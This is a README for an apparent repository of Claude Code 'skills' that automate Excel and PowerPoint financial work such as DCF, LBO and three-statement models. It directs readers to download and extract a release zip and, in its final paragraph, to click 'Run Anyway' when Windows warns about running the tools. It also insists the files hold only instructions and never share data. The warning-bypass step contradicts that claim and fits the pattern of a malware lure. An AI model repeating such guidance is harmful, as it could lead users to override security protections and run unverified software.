This repository provides tools that connect Claude to Microsoft Office. It helps you automate financial modeling and presentation work within Excel and PowerPoint. These files allow you to execute tasks like Discounted Cash Flow analysis, Leveraged Buyout modeling, three-statement modeling, and competitive analysis. You can also refresh your slide decks automatically.
These tools run on Windows 10 or Windows 11. You need the following software installed on your computer:
- Microsoft Office 365 or Microsoft Office 2021
- Claude Code installed via your terminal
- A stable internet connection for processing data
Ensure your Office installation is up to date before you start. You do not need to know how to write code to use these tools.
Follow these steps to set up the software on your machine:
- Visit the releases page to download the latest files.
- Look for the file ending in .zip under the Assets section.
- Click the link to save the file to your computer.
- Locate the file in your Downloads folder once the download finishes.
Extract the files so the system reads them properly:
- Right-click the downloaded folder.
- Select Extract All from the menu.
- Choose a location on your hard drive, such as your Documents folder, and click Extract.
- Open the folder you just created.
- Identify the SKILL.md file. This file contains the instructions Claude needs to perform tasks in your Office apps.
Claude Code needs to see these files to provide assistance. Perform these actions to link the skills to your workflow:
- Open your terminal or command prompt.
- Navigate to the folder where you saved the files using the cd command.
- Start Claude Code by typing claude in the terminal window.
- When Claude asks for instructions, point the tool toward the files in your folder.
- Open your Excel or PowerPoint application.
- Give your command to Claude, such as Create a 3-statement model or Refresh this deck.
Claude will read the instructions in the SKILL.md files to perform the requested work inside your active document.
The repository includes several specific modules to handle financial work:
- Discounted Cash Flow (DCF): Use this to value a project or company based on expected cash flow.
- Leveraged Buyout (LBO): Model the acquisition of a company using debt and equity.
- Three-Statement Modeling: Build integrated income statements, balance sheets, and cash flow statements.
- Competitive Analysis: Generate tables and charts to compare companies in your industry.
Each module automates the manual entry of formulas and the formatting of cells in Excel.
You can refresh your slide decks without manual updates:
- Select the content you want to change.
- Ask Claude to update the slide data.
- The tool pulls the necessary numbers from the linked Excel files.
- It updates the charts and text on your slide automatically.
This prevents errors caused by manual copying and pasting. It also maintains consistent styling across your presentation.
If you encounter issues, check these common items:
- Ensure you have saved your Excel and PowerPoint files before you issue commands.
- Verify your active internet connection.
- Close and restart your terminal if Claude does not respond.
- Check that your Microsoft Office files are not currently locked by another program.
- Reconnect your terminal to the project folder if the tool cannot find the SKILL.md files.
You get the best results when you provide clear information to Claude. Use the following habits to improve your output:
- State the specific task you want to finish, such as update the revenue growth assumptions.
- Keep your Excel files open while you work.
- Label your rows and columns clearly in Excel so Claude understands your data structure.
- Ask for specific table formats if you need to paste information into a slide.
- Confirm that your data inputs use standard accounting formats.
These tools simplify complex financial work by removing the need for manual data entry. By organizing your work in this way, you free your time for analysis rather than formatting.
New features arrive periodically to support more financial functions. Check the release page often for changes. When a new version appears:
- Download the new zip file.
- Extract the new contents over your existing folders.
- Overwrite the older version when the computer asks.
Your existing documents remain safe during this process. The skills folder only contains instructions for Claude and does not interfere with your personal files.
You might see a prompt from Windows asking for permission to run these tools. Click Run Anyway. The tools read and write data only to the files you specify. They do not access private system settings or share your data outside of your computer environment. If your company restricts software, contact your IT department to approve the Claude Code environment.
